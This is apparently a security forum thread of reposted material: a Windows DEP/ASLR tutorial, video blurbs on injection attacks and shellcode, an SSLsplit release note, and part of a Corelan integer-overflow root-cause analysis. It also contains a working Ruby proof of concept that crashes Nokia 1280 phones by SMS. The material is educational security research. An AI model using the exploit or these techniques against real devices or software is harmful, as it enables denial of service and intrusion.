Protecting Data Structure Overwrite One of the conditions already mentioned was that if we can overwrite certain data structure, we might be able to gain control of the program and possibly the whole system. The data structures that we can overwrite are the following: EIP in Stack Frame—When a function is called, it is stored a function frame on the stack, which also contains the EIP that points to the next instruction after the function call, which is required so that the function knows where to return to. If we overwrite the EIP return address, we’ll be able to jump and execute the instruction on the arbitrary memory address. Function Pointers—We can also overwrite a function pointer that points to a function on the heap. If we overwrite the function pointer to point to our shellcode somewhere in memory, that shellcode will be executed whenever the function is called (the one whose pointer address we’ve overwritten). Keep in mind that function pointers can be allocated anywhere in memory, on stack, heap, data, etc. Longjmp Buffers—The C programming language has something called a checkpoint/rollback system called setjmp/longjmp. The basic idea is to use the setjmp (buffer) to go to checkpoint and then use the longjmp (buffer) to go back to the checkpoint. But if we manage to overflow the buffer, the longjmp (buffer) might jump back to our shellcode instead. SEH Overwrite—We can overwrite stack exception handling structures stored on the stack, which can allow us to gain code execution when an exception occurs. Program Logic—With this attack, we’re overflowing the arbitrary data structure that a program uses incorrectly: by possibly executing the inputted shellcode. This is a really rare occurrence of a bug, but is still possible. Other—There are other structures that we can overwrite to gain code execution as well. We can use the following techniques to defend the data structures (summarized from [1]): Non-Executable Stack—If the stack is non-executable, then we won’t be able to execute the code written to the stack. This protection is very effective against stack buffer overflow attacks, but doesn’t protect us from overflowing other data structures and executing the shellcode from there. DEP (Data Execution Prevention)—When DEP is enabled, we can’t execute the code from pages that are marked as data. This is an important observation, because with typical problems the code is not contained and executed from stack or heap structures, which typically contain only data. Array Bounds Checking—With this prevention mechanism, the buffer overflows are completely eliminated, because we can’t actually overflow an array, since the bounds are being checked automatically (without user intervention). But this approach rather slows down the program execution, since every access to an array must be checked to see if it’s within the bounds. Code Pointer Integrity Check—This protection provides a way to check whether the pointer has been corrupted before trying to execute the data from that address. DEP (Data Execution Prevention) We’ve already mentioned that DEP allows the pages in memory to be marked as non-executable, which prevents the instructions in those pages to be executed (usually the stack and heap data structure are used with DEP enabled). If the program wants to execute code from the DEP-enabled memory page, an exception is generated, which usually means the program will terminate. The default setting in a Windows system is that DEP is enabled. To check whether DEP is enabled, we must look into the C:\boot.ini configuration file and look at the /noexecute flag value. The values of the /noexecute switch can be one of the following values: OptIn—DEP enabled for system modules, but user applications can be configured to also support DEP OptOut—DEP enabled for all modules and user applications, but can be disabled for certain user applications AlwaysOn—DEP enabled for all modules and all user applications and we can’t switch it off for any user application AlwaysOff—DEP disabled for all modules and all applications and we can’t switch it on for any user application or any system module We can see that with OptIn and OptOut options, we can dynamically change whether the DEP is enabled or disabled for certain user applications. We can do that with the use of the SetProcessDEPPolicy system function. The syntax of the function is presented below (taken from [2]): The SetProcessDEPPolicy function overrides the system DEP policy for the current process unless its DEP policy was specified at process creation. The system DEP policy setting must be OptIn or OptOut. If the system DEP policy is AlwaysOff or AlwaysOn, SetProcessDEPPolicy returns an error. After DEP is enabled for a process, subsequent calls to SetProcessDEPPolicy are ignored [2]. The dwFlags parameter can be one of the following: 0—Disables the DEP for the current process if system DEP policy is either OptIn or OptOut. 1—Enables the DEP permanently for the current process. We can enable/disable DEP for certain user applications if we right-click on My Computer, then go to Advanced and click on Performance Settings – Data Execution Prevention, we see picture below: Currently the OptIn is set in the C:\boot.ini, which resembles the options specified above. If DEP was disabled, the options above would be grayed out: they are only enabled when OptIn or OptOut is being used. Let’s change the DEP configuration option to OptOut in the Performance Options window and also add an exception so that iexplore.exe won’t have DEP enabled. We see the picture below: Once we click on the Open button, the IEXPLORE.EXE will be added to the list of user applications that have DEP disabled, which can be seen in the picture below: Once we try to save the settings, a warning will pop-up notifying us that we must restart the computer in order for changes to take effect: We must click on OK and then restart the computer. Then we can open two processes, explorer.exe and opera.exe and observe their DEP settings in the Windbg kernel debugger. Then we need to execute the “!process 0 0? command to display the details about every process running on the system. The information about the explorer.exe and opera.exe are shown below: kd> !process 0 0 PROCESS 821dc620 SessionId: 0 Cid: 05c0 Peb: 7ffd9000 ParentCid: 05cc DirBase: 093c0180 ObjectTable: e1827200 HandleCount: 288. Image: opera.exe PROCESS 822d2948 SessionId: 0 Cid: 05c8 Peb: 7ffdf000 ParentCid: 05cc DirBase: 093c0280 ObjectTable: e1de34b8 HandleCount: 563. Image: IEXPLORE.EXE The !process command is a good way to get the pointer to the EPROCESS data structure of each process: the pointer to the opera.exe EPROCESS data structure is 0x821dc620, while the pointer to the IEXPLORE.EXE EPROCESS data structure is 0x822d2948. Let’s now show the EPROCESS data structure of each of the processes: kd> dt nt!_EPROCESS 821dc620 +0x000 Pcb : _KPROCESS +0x06c ProcessLock : _EX_PUSH_LOCK +0x070 CreateTime : _LARGE_INTEGER 0x01ce1da6`e74feeaa +0x078 ExitTime : _LARGE_INTEGER 0x0 +0x080 RundownProtect : _EX_RUNDOWN_REF +0x084 UniqueProcessId : 0x000005c0 Void kd> dt nt!_EPROCESS 822d2948 +0x000 Pcb : _KPROCESS +0x06c ProcessLock : _EX_PUSH_LOCK +0x070 CreateTime : _LARGE_INTEGER 0x01ce1da6`e7a8e488 +0x078 ExitTime : _LARGE_INTEGER 0x0 +0x080 RundownProtect : _EX_RUNDOWN_REF +0x084 UniqueProcessId : 0x000005c8 Void I didn’t present the whole output from that command, because the output is too long and we’re not interested in the rest of the output right now. We’re only interested in the first element of the EPROCESS structure, which is the KPROCESS data substructure, as we can see above. Since the first element of the EPROCESS data structure is the KPROCESS data structure, we can display that with the same memory address as we used when printing the EPROCESS data structure. We can also use the -r switch to the command to go into every substructure of the KPROCESS structure and display all of the known elements. There are a lot of members of the KPROCESS data structure, which is why we’ll only be showing the most important ones (in the output below we presented only the Flags data member): kd> dt nt!_KPROCESS 821dc620 -r +0x06b Flags : _KEXECUTE_OPTIONS +0x000 ExecuteDisable : 0y1 +0x000 ExecuteEnable : 0y0 +0x000 DisableThunkEmulation : 0y1 +0x000 Permanent : 0y1 +0x000 ExecuteDispatchEnable : 0y0 +0x000 ImageDispatchEnable : 0y0 +0x000 Spare : 0y00 +0x06b ExecuteOptions : 0xd '' kd> dt nt!_KPROCESS 822d2948 -r +0x06b Flags : _KEXECUTE_OPTIONS +0x000 ExecuteDisable : 0y0 +0x000 ExecuteEnable : 0y1 +0x000 DisableThunkEmulation : 0y0 +0x000 Permanent : 0y0 +0x000 ExecuteDispatchEnable : 0y1 +0x000 ImageDispatchEnable : 0y1 +0x000 Spare : 0y00 +0x06b ExecuteOptions : 0x32 '2' The important flags that we’re interested right now are the ExecuteDisable and ExecuteEnable. The ExecuteDisable flag is set to 1 whenever DEP is enabled, while the ExecuteEnable flag is set to 1 whenever DEP is disabled. Also the Permanent flag is set to 1 if the process cannot change the DEP policy by itself. Let’s review the settings of both processes, the IEXPLORE.EXE and opera.exe: [TABLE] [TR] [TD][/TD] [TD]ExecuteDisable[/TD] [TD]ExecuteEnable[/TD] [TD]Permanent[/TD] [/TR] [TR] [TD]Opera.exe[/TD] [TD]1[/TD] [TD]0[/TD] [TD]1[/TD] [/TR] [TR] [TD]IEXPLORE.EXE[/TD] [TD]0[/TD] [TD]1[/TD] [TD]0[/TD] [/TR] [/TABLE] We can see that the options are exactly the opposite for those two processes. The IEXPLORE.EXE process has DEP disabled, because the ExecuteDisable is set to 0 and ExecuteEnable is set to 1, while the opera.exe has DEP enabled, because the ExecuteDisable is set to 1 and ExecuteEnable is set to 0. The IEXPLORE.EXE has DEP disabled only because we’ve added the exception to the OptOut system DEP policy. Address Space Layout Randomization (ASLR) The Windows systems use PE headers to describe the executable files. One of the elements of the PE header is the preferred load address that is stored in the ImageBase element in the optional header. The address stored in the ImageBase is the linear address where the executable will be loaded if it can be loaded there (by default this address is 0×400000). For the next test, you have to have the Sysinternals Suite downloaded, particularly the listdlls.exe program. Let’s start the notepad.exe process and then execute the “listdlls.exe notepad.exe” program, which will list all the loaded DLLs from the notepad.exe program. The output can be seen below: We can see that the notepad.exe executable is loaded at the default virtual/linear address 0×01000000, which is not the default address 0×400000. Actually, the 0×01000000 is the default address where libraries are loaded. Let’s download the trial version of PE Explorer and open the notepad.exe executable into it. Now let’s take a look at the ImageBase element, which can be seen in the picture below: it has a value 0×01000000, which is also the preferred address of where the notepad.exe will get loaded into memory: Now we need to restart the system and use the listdlls.exe program again to list all the DLLs loaded in the notepad.exe program. The result can be seen in the picture below: Notice that the base address of the notepad.exe and every corresponding library is the same? Because of this, exploit writing has been very successful in the last couple of years. The reason is that hackers could use a hardcoded address in their exploits, which would work on various versions of Windows systems, because the virtual/linear addresses of the programs are always the same. Windows Vista presented a concept known as address space layout randomization or ASLR that loads the executables and libraries that support ASLR at arbitrary base address every time the system reboots. This makes it difficult to hardcode the addresses in the exploits, but it is still possible. The reason is the executable and all the libraries the process uses must be compiled with ASLR enabled, but this often isn’t so. The developers almost never compile the executable with ASLR enabled, and even some system libraries provided by Microsoft are not always compiled with ASLR enabled. But the attacker needs only one address to be at a constant place (even when the operating system is rebooted) in order to exploit a buffer overflow (or some other bug); thus he only needs one executable or one loaded library file to not be compiled with ASLR enabled. But because it’s still often the case that at least some library doesn’t support ASLR, ASLR protection is rather easy to bypass and thus not really effective. If we click on the Characteristics element in PE Explorer, we can see that the 0×0040 field is currently being used to specify whether the library was compiled with ASLR support, is marked as “Use of this flag is reserved for future use”. This clearly means that the ASLR is disabled and not available for the notepad.exe, as we already saw previously. But ASLR can nevertheless be enabled system-wide by adding the MoveImages registry key to the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\. We can do that by adding a new DWORD value, setting the key to the MoveImages and the value to 0xFFFFFFFF. This can be seen in the picture below, where the MoveImages key has been added to the registry: Upon adding the MoveImages key, we need to restart the computer. Then we can again execute the “listdlls.exe notepad.exe” program to check the base addresses of loaded libraries: Notice that the base addresses are the same even though we’ve added the MoveImages to the registry. The problem is that Windows XP doesn’t support ASLR, which is one reason among many to switch to a newer system, such as Windows Vista or Windows 7. But ASLR doesn’t affect only the base address where the libraries are loaded, but also the base address of stack, heap and other stuff that must be loaded into memory. But the DLL libraries are loaded at the same address regarding of the process using them; this is set up during the boot process of Windows. Let’s now start the Windows 7 system and check the base addresses of modules in Ollydbg when loading the notepad.exe executable. The modules and their corresponding base addresses can be seen in the picture below: After that we can restart Windows, and reopen notepad.exe in Ollydbg. Let’s list the modules again. Notice that the modules have been loaded at different base addresses? This is the effect of the ASLR being enabled. Now whenever we want to hardcode the address in shellcode, the address will be wrong after restarting the system, because the base address of the modules is at a different location; this means that the hardcoded address will not point to a different instructions in memory (if that memory is even loaded into the memory user address space). References: [1] StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks, Crispin Cowan, Calton Pu, Dave Maier, Heather Hinton, Jonathan Walpole, Peat Bakke, Steave Beattie, Aaron Grier, Perry Wagle and Qian Zhand, San Antonio, Texas, January 26-29, 1998. [2] SetProcessDEPPolicy function (Windows), accessible at SetProcessDEPPolicy function (Windows). Sursa: Windows Memory Protection Mechanisms
  10. Web Application - Csrf Explained Description: In this video you will learn about CSRF (Cross Site Request Forgery). This CSRF is a one of the most common attacks in Web Application Hacking and every web application should be aware of it. Sursa: Web Application - Csrf Explained
  11. Understanding Sql Injection, Xml Injection, And Ldap Injection Description: This is a very good short video about SQLI, XML Injection and LDAP Injection. So Messer will explain how SQL Injection will works how XML, LDAP Injection will works on Web Application and responsible for some of big industries data breaches. Sursa: Understanding Sql Injection, Xml Injection, And Ldap Injection
  12. Introduction To Sql Injection Description: In this video you will learn how to exploit web application using SQL Injection, Error Based SQL Injection, Analysis of vulnerable PHP code, Download website and database lab etc .. Sursa: Introduction To Sql Injection
  13. Writing Shellcode And Gaining Root Access http://www.youtube.com/watch?feature=player_embedded&v=uRCyIQrLV5Q Description: In this video you will learn how to write a shellcode and gain root access without any passwords. Sursa: Writing Shellcode And Gaining Root Access
  14. Blind Xpath Injection Description: In this video you will learn how to exploit Blind Xpath Injection using a tool of Blind Xpath Injection. https://www.owasp.org/index.php/Blind_XPath_Injection XPath is a type of query language that describes how to locate specific elements (including attributes, processing instructions, etc.) in an XML document. Since it is a query language, XPath is somewhat similar to Structured Query Language (SQL), however, XPath is different in that it can be used to reference almost any part of an XML document without access control restrictions. In SQL, a "user" (which is a term undefined in the XPath/XML context) may be restricted to certain databases, tables, columns, or queries. Using an XPATH Injection attack, an attacker is able to modify the XPATH query to perform an action of his choosing. Sursa: Blind Xpath Injection
  15. Nokia 1280 Denial Of Service Nokia 1280 phones suffers from a denial of service vulnerability when receiving a large SMS. ########################################################################################################### #Exploit Title: Nokia 1280 DoS Vulnerability #Author : Un0wn_X #E-Mail : unownsec@gmail.com #Date : Monday, July 01,2013 #Product: http://www.nokia.com/in-en/phones/phone/nokia-1280/ ########################################################################################################### #Vulnerability Advisory ======================= You can send a SMS containing the malicious buffer and can crash the phone once it loads in the memory. #Video PoC ============ http://www.youtube.com/watch?v=csLuNZ0mjpI #Exploit ========= #!/usr/bin/env ruby #Author: Un0wn_X begin buff = "Don't Scroll Down \n\n" buff += "'"*100 file = open("exploit.txt","w") file.write(buff) file.close() puts "[+] Exploit created >> exploit.txt" puts " [*] Now send the text contained inside the exploit.txt by a sms" puts "[~] Un0wn_X" end #Final Notes ============= I have no idea to attach this to a debugger and fuzz this system. You may exploit further Sursa: Nokia 1280 Denial Of Service ? Packet Storm
  16. SSLsplit 0.4.7 Site roe.ch SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing. Changes: This release prevents IETF draft public key pinning by removing HPKP headers from responses. Also, remaining threading issues in daemon mode are fixed, and the connection log now contains the HTTP status code and the size of the response. Download: http://packetstormsecurity.com/files/download/122283/sslsplit-0.4.7.tar.bz2 Sursa: SSLsplit 0.4.7 ? Packet Storm
  17. [h=2]Root Cause Analysis – Integer Overflows[/h]Published July 2, 2013 | By Corelan Team (Jason Kratzer) Table of Contents [hide] Foreword Introduction Analyzing the Crash Data Identifying the Cause of Exception Page heap Initial analysis [*]Reversing the Faulty Function [*]Determining Exploitability Challenges Prerequisites Heap Basics Lookaside Lists Freelists [*]Preventative Security Measures Safe-Unlinking Heap Cookies [*]Application Specific Exploitation Thoughts on This Attack [*]Generic Exploitation Methods Lookaside List Overwrite Overview Application Specific Technique Why Not? [*]Brett Moore: Wrecking Freelist[0] Since 2005 [*]Freelist[0] Insert Attack Overview Application Specific Technique Why Not? [*]Freelist[0] Searching Attack Overview Application Specific Technique Why Not? [*]Conclusion Recommended Reading [*]Share this: [*]Related Posts: [h=3]Foreword[/h] Over the past few years, Corelan Team has received many exploit related questions, including "I have found a bug and I don’t seem to control EIP, what can I do ?"; "Can you write a tutorial on heap overflows" or "what are Integer overflows". In this article, Corelan Team member Jason Kratzer (pyoor) tries to answer some of these questions in a very practical, hands-on way. He went to great lengths to illustrate the process of finding a bug, taking the crash information and reverse engineering the crash context to identifying the root cause of the bug, to finally discussing multiple ways to exploit the bug. Of course, most – if not all – of the techniques in this document were discovered many years ago, but I’m sure this is one of the first (public) articles that shows you how to use them in a real life scenario, with a real application. Although the techniques mostly apply to Windows XP, we believe it is required knowledge, necessary before looking at newer versions of the Windows Operating system and defeating modern mitigation techniques. enjoy ! - corelanc0d3r [h=3]Introduction[/h] In my previous article, we discussed the process used to evaluate a memory corruption bug that I had identified in a recently patched version of KMPlayer. With the crash information generated by this bug we were able to step through the crash, identify the root cause of our exception, and determine exploitability. In doing so, we were able to identify 3 individual methods that could potentially be used for exploitation. This article will serve as a continuation of the series with the intention of building upon some of the skills we discussed during the previous “Root Cause Analysis” article. I highly recommend that if you have not done so already, please review the contents of that article (located here) before proceeding. For the purpose of this article, we’ll be analyzing an integer overflow that I had identified in the GOM Media Player software developed by GOM Labs. This bug affects GOM Media Player 2.1.43 and was reported to the GOM Labs development team on November 19, 2012. A patch was released to mitigate this issue on December 12, 2012. As with our previous bug, I had identified this vulnerability by fuzzing the MP4/QT file formats using the Peach Framework (v2.3.9). In order to reproduce this issue, I have provided a bare bones fuzzing template (Peach PIT) which specifically targets the vulnerable portion of the MP4/QT file format. You can find a copy of that Peach PIT here. The vulnerable version of GOM player can be found here. [h=3]Analyzing the Crash Data[/h] Let’s begin by taking a look at the file, LocalAgent_StackTrace.txt, which was generated by Peach at crash time. I’ve included the relevant portions below: (cdc.5f8): Access violation - code c0000005 (first chance) r eax=00000028 ebx=0000004c ecx=0655bf60 edx=00004f44 esi=06557fb4 edi=06555fb8 eip=063b4989 esp=0012bdb4 ebp=06557f00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 GSFU!DllUnregisterServer+0x236a9: 063b4989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0655c000=???????? kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012bdc0 063b65eb 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x236a9 0012bdd8 063b8605 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x2530b 0012be00 063b8a85 064dcda8 0652afb8 0652afb8 GSFU!DllUnregisterServer+0x27325 0012be18 063b65eb 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x277a5 0012be30 063b8605 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x2530b 0012be58 063b8a85 064dcda8 06510fb8 06510fb8 GSFU!DllUnregisterServer+0x27325 0012be70 063b65eb 064dcda8 06510fb8 06500fb8 GSFU!DllUnregisterServer+0x277a5 <...truncated...> INSTRUCTION_ADDRESS:0x00000000063b4989 INVOKING_STACK_FRAME:0 DESCRIPTION:User Mode Write AV SHORT_DESCRIPTION:WriteAV CLASSIFICATION:EXPLOITABLE BUG_TITLE:Exploitable - User Mode Write AV starting at GSFU!DllUnregisterServer+0x00000000000236a9 (Hash=0x1f1d1443.0x00000000) EXPLANATION:User mode write access violations that are not near NULL are exploitable. (You can download the complete Peach crash data here) As we can see here, we’ve triggered a write access violation by attempting to write the value of edx to the location pointed at by [ecx+eax*4]. This instruction fails of course because the location [ecx+eax*4] points to an inaccessible region of memory. (0655c000=????????) Since we do not have symbols for this application, the stack trace does not provide us with any immediately evident clues as to the cause of our exception. Furthermore, we can also see that !exploitable has made the assumption that this crash is exploitable due to the fact that the faulting instruction attempts to write data to an out of bounds location and that location is not near null. It makes this distinction because a location that is near null may be indicative of a null pointer dereference and these types of bugs are typically not exploitable (though not always). Let’s try and determine if !exploitable is in fact, correct in this assumption. [h=3]Identifying the Cause of Exception[/h] [h=4]Page heap[/h] Before we begin, there’s something very important that we must discuss. Take a look at the bare bones Peach PIT I’ve provided; particularly the Agent configuration beginning at line 55. <Agent name="LocalAgent"> <Monitor class="debugger.WindowsDebugEngine"> <Param name="CommandLine" value="C:\Program Files\GRETECH\GomPlayer\GOM.EXE "C:\fuzzed.mov"" /> <Param name="StartOnCall" value="GOM.EXE" /> </Monitor> <Monitor class="process.PageHeap"> <Param name="Executable" value="GOM.EXE"/> </Monitor> </Agent> Using this configuration, I’ve defined the primary monitor as the “WindowsDebugEngine” which uses PyDbgEng, a wrapper for the WinDbg engine dbgeng.dll, in order to monitor the process. This is typical of most Peach fuzzer configurations under windows. However, what’s important to note here is the second monitor, “process.PageHeap”. This monitor enables full page heap verification by using the Microsoft Debugging tool, GFlags (Global Flags Editor). In short, GFlags is a utility that is packaged with the Windows SDK, and enables users to more easily troubleshoot potential memory corruption issues. There are a number of configuration options available with GFlags. For the purpose of this article, we’ll only be discussing 2: standard and full page heap verification. When using page heap verification, a special page header prefixes each heap chunk. The image below displays the structure of a standard (allocated) heap chunk and the structure of an (allocated) heap chunk with page heap enabled. This information can also be extracted by using the following display types variables: # Displays the standard heap metadata. Replace 0xADDRESS with the heap chunk start address dt _HEAP_ENTRY 0xADDRESS # Displays the page heap metadata. Replace 0xADDRESS with the start stamp address. dt _DPH_BLOCK_INFORMATION 0xADDRESS One of the most important additions to the page heap header is the "user stack traces" (+ust) field. This field contains a pointer to the stack trace of our allocated chunk. This means that we’re now able to enumerate which functions eventually lead to the allocation or free of a heap chunk in question. This is incredibly useful when trying to track down the root cause of our exception. Both standard and full heap verification prefix each chunk with this header. The primary difference between standard and full page heap verification is that under standard heap verification, fill patterns are placed at the end of each heap chunk (0xa0a0a0a0). If for instance a buffer overflow were to occur and data was written beyond the boundary of the heap chunk, the fill pattern located at the end of the chunk would be overwritten and therefore, corrupted. When our now corrupt block is accessed by the heap manager, the heap manager will detect that the fill pattern has been modified/corrupted and cause an access violation to occur. With full page heap verification enabled, rather than appending a fill pattern, each heap chunk is placed at the end of a (small) page. This page is followed by another (small) page that has the PAGE_NOACCESS access level set. Therefore, as soon as we attempt to write past the end of the heap chunk, an access violation will be triggered directly (in comparison with having to wait for a call to the heap manager). Of course, the use of full page heap will drastically change the heap layout, because a heap allocation will trigger the creation of a new page. In fact, the application may even run out of heap memory space if your application is performing a lot of allocations. For a full explanation of GFlags, please take a look at the MSDN documentation here. Now the reason I’ve brought this up, is that in order to replicate the exact crash generated by Peach, we’ll need to enable GFlags for the GOM.exe process. GFlags is part of the Windows Debugging Tools package which is now included in the Windows SDK. The Windows 7 SDK, which is recommended for both Windows XP and 7 can be found here. In order to enable full page heap verification for the GOM.exe process, we’ll need to execute the following command. C:\Program Files\Debugging Tools for Windows (x86)>gflags /p /enable GOM.exe /full [h=4]Initial analysis[/h] With that said, let’s begin by comparing our original seed file and mutated file using the 010 Binary Editor. Please note that in the screenshot below, “Address A” and “Address B” correlate with OriginalSeed.mov and MutatedSeed.mov respectively. Here we can see that our fuzzer applied 8 different mutations and removed 1 block element entirely (as identified by our change located at offset 0x12BE). As documented in the previous article, you should begin by reverting each change, 1 element at a time, from their mutated values to those found in the original seed file. After each change, save the updated sample and open it up in GOM Media Player while monitoring the application using WinDbg. windbg.exe "C:\Program Files\GRETECH\GomPlayer\GOM.EXE" "C:\Path-To\MutatedSeed.mov" The purpose here is to identify the minimum number of mutated bytes required to trigger our exception. Rather than documenting each step of the process which we had already outlined in the previous article, we’ll simply jump forward to the end result. Your minimized sample file should now look like the following: Here we can see that a single, 4 byte change located at file offset 0x131F was responsible for triggering our crash. In order to identify the purpose of these bytes, we must identify what atom or container they belong to. Just prior to our mutated bytes, we can see the ASCII string “stsz”. This is known as a FourCC. The QuickTime and MPEG-4 file formats rely on these FourCC strings in order to identify various atoms or containers used within the file format. Knowing that, we can lookup the structure of the “stsz” atom in the QuickTime File Format Specification found here. Size: 0x00000100 Type: 0x7374737A (ASCII stsz) Version: 0x00 Flags: 0x000000 Sample Size: 0x00000000 Number of Entries: 0x8000000027 Sample Size Table(1): 0x000094B5 Sample Size Table(2): 0x000052D4 Looking at the layout of the “stsz” atom, we can see that the value for the “Number of Entries” element has been replaced with a significantly larger value (0×80000027 compared with the original value of 0x3B). Now that we’ve identified the minimum change required to trigger our exception, let’s take a look at the faulting block (GSFU!DllUnregisterServer+0x236a9) in IDA Pro. [h=3]Reversing the Faulty Function[/h] Without any state information, such as register values or memory locations used during run time, we can only make minor assumptions based on the instructions contained within this block. However, armed with only this information, let’s see what we can come up with. Let’s assume that eax and edx are set to 0×00000000 and that esi points to 0xAABBCCDD A single byte is moved from the location pointed at by esi to edx resulting in edx == 0x000000AA A single byte is moved from the location pointed at by [esi+1] to ecx edx is shifted left by 8 bytes resulting in 0x0000AA00 ecx is added to @edx resulting in 0x0000AABB A single byte is moved from the location pointed at by [esi+2] to ecx edx is again shifted left by 8 bytes resulting in 0x00AABB00 ecx is again added to edx resulting in 0x00AABBCC A single byte is moved from the location pointed at by [esi+3] to ecx edx is again shifted left by 8 bytes resulting in 0xAABBCC00 And finally, ecx is added to edx resulting in 0xAABBCCDD So what does this all mean? Well, our first 10 instructions appear to be an overly complex version of the following instruction: movzx edx, dword ptr [esi] However, upon closer inspection what we actually see is that due to the way bytes are stored in memory, this function is actually responsible for reversing the byte order of the input string. So our initial read value of 0×41424344 (ABCD) will be written as 0×44434241 (DCBA). With that said, let’s reduce our block down to: loc_3B04960: cmp ebx, 4 jl short loc_3B0499D ; Jump outside of our block movzx edx, dword ptr [esi] ; Writes reverse byte order ([::-1]) mov ecx, [edi+28h] mov ecx, [ecx+10h] mov [ecx+eax*4], edx ; Exception occurs here. ; Write @edx to [ecx+eax*4] mov edx, [edi+28h] mov ecx, [edx+0Ch] add esi, 4 sub ebx, 4 inc eax cmp eax, ecx jb short loc_3B04960 Now before we actually observe our block in the debugger, there are still a few more characteristics we can enumerate. The value pointed to by esi is moved to edx edx is then written to [ecx+eax*4] The value of esi is increased by 4 The value of ebx is decreased by 4 eax is incremented by 1 The value of eax is compared against ecx. If eax is equal to ecx, exit the block. Otherwise, jump to our first instruction. Once at the beginning of our block, ebx is then compared against 0×4. If ebx is less than 4, exit the block. Otherwise, perform our loop again. To summarize, our first instruction attempts to determine if ebx is less than or equal to 4. If it is not, we begin our loop by moving a 32 bit value at memory location “A” and write it to memory location “B”. Then we check to make sure eax is not equal to ecx. If it isn’t, then we return to the beginning of our loop. This process will continue, performing a block move of our data until one of our 2 conditions are met. With a rough understanding of the instruction set, let’s observe its behavior in our debugger. We’ll set the following breakpoints which will halt execution if either of our conditions cause our block iteration to exit and inform us of what data is being written and to where. r @$t0 = 1 bp GSFU!DllUnregisterServer+0x23680 ".printf \"Block iteration #%p\\n\", @$t0; r @$t0 = @$t0 + 1; .if (@ebx <= 0x4) {.printf \"1st condition is true. Exiting block iteration\\n\"; } .else {.printf \"1st condition is false (@ebx == 0x%p). Performing iteration\\n\", @ebx; gc}" bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4); gc" bp GSFU!DllUnregisterServer+0x236b9 ".if (@eax == @ecx) {.printf \"2nd is false. Exiting block iteration.\\n\\n\"; } .else {.printf \"2nd condition is true. ((@eax == 0x%p) <= (@ecx == 0x%p)). Performing iteration\\n\\n\", @eax, @ecx; gc}" With our breakpoints set, you should see something similar to the following: Block iteration #00000001 1st condition is false (@ebx == 0x000000ec). Performing iteration The value, 0x000094b5, is taken from 0x07009f14 and written to 0x0700df60 2nd condition is true. ((@eax == 0x00000001) <= (@ecx == 0x80000027)). Performing iteration Block iteration #00000002 1st condition is false (@ebx == 0x000000e8). Performing iteration The value, 0x000052d4, is taken from 0x07009f18 and written to 0x0700df64 2nd condition is true. ((@eax == 0x00000002) <= (@ecx == 0x80000027)). Performing iteration ...truncated... Block iteration #00000028 1st condition is false (@ebx == 0x00000050). Performing iteration The value, 0x00004fac, is taken from 0x07009fb0 and written to 0x0700dffc 2nd condition is true. ((@eax == 0x00000028) <= (@ecx == 0x80000027)). Performing iteration Block iteration #00000029 1st condition is false (@ebx == 0x0000004c). Performing iteration The value, 0x00004f44, is taken from 0x07009fb4 and written to 0x0700e000 (1974.1908): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000028 ebx=0000004c ecx=0700df60 edx=00004f44 esi=07009fb4 edi=07007fb8 eip=06e64989 esp=0012bdb4 ebp=07009f00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 GSFU!DllUnregisterServer+0x236a9: 06e64989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0700e000=???????? Here we can see that neither of our conditions caused our block iteration to exit. Our instruction block performed 0×29 writes until a memory boundary was reached (likely caused by our full page heap verification) which triggers an access violation. Using the ‘db’ command, we let’s take a look at the data we’ve written. 0:000> db 0x0700df60 0700df60 b5 94 00 00 d4 52 00 00-a8 52 00 00 2c 52 00 00 .....R...R..,R.. 0700df70 7c 52 00 00 80 52 00 00-a4 52 00 00 28 53 00 00 |R...R...R..(S.. 0700df80 18 53 00 00 94 52 00 00-20 53 00 00 ac 52 00 00 .S...R.. S...R.. 0700df90 28 53 00 00 e0 51 00 00-d0 52 00 00 88 52 00 00 (S...Q...R...R.. 0700dfa0 e0 52 00 00 94 52 00 00-18 53 00 00 14 52 00 00 .R...R...S...R.. 0700dfb0 14 52 00 00 5c 52 00 00-34 52 00 00 08 52 00 00 .R..\R..4R...R.. 0700dfc0 d4 51 00 00 84 51 00 00-d8 51 00 00 d8 50 00 00 .Q...Q...Q...P.. 0700dfd0 3c 51 00 00 04 52 00 00-a4 51 00 00 bc 50 00 00 <q...r...q...p.. Now let’s break down the information returned by our breakpoints: First, taking a look at our write instructions we can see that the data being written appears to be the contents of our “Sample Size Table”. Our vulnerable block is responsible for reading 32 bits during each iteration from a region of memory beginning at 0x07009F14 and writing it to a region beginning at 0x0700DF60 (these addresses may be different for you and will likely change after each execution). This is good a good sign as it means that we can control what data is being written. Furthermore, we can see that during our second condition, eax is being compared against the same value being provided as the “Number of Entries” element within our “stsz” atom. This means that we can control at least 1 of the 2 conditions which will determine how many times our write instruction occurs. This is good. As with our previous example (KMPlayer), we demonstrated that if we can write beyond the intended boundary of our function, we may be able to overwrite sensitive data. As for our first condition, it’s not yet apparent where the value stored in ebx is derived. More on this in a bit. At this point, things are looking pretty good. So far we’ve determined that we can control the data we write and at least one of our conditions. However, we still haven’t figured out yet why we’re writing beyond our boundary and into the guard page. In order to determine this, we’ll need to enumerate some information regarding the region where our data is being written, such as the size and type (whether it be stack, heap, or virtually allocated memory). To do so, we can use corelan0cd3r’s mona extension for WinDbg. Before we do however, we’ll need to modify Gflags to only enable standard page heap verification. The reason for this is that when using full page heap verification, Gflags will modify our memory layout in such a way that will not accurately reflect our memory state when run without GFlags. To enable standard page heap verification, we’ll 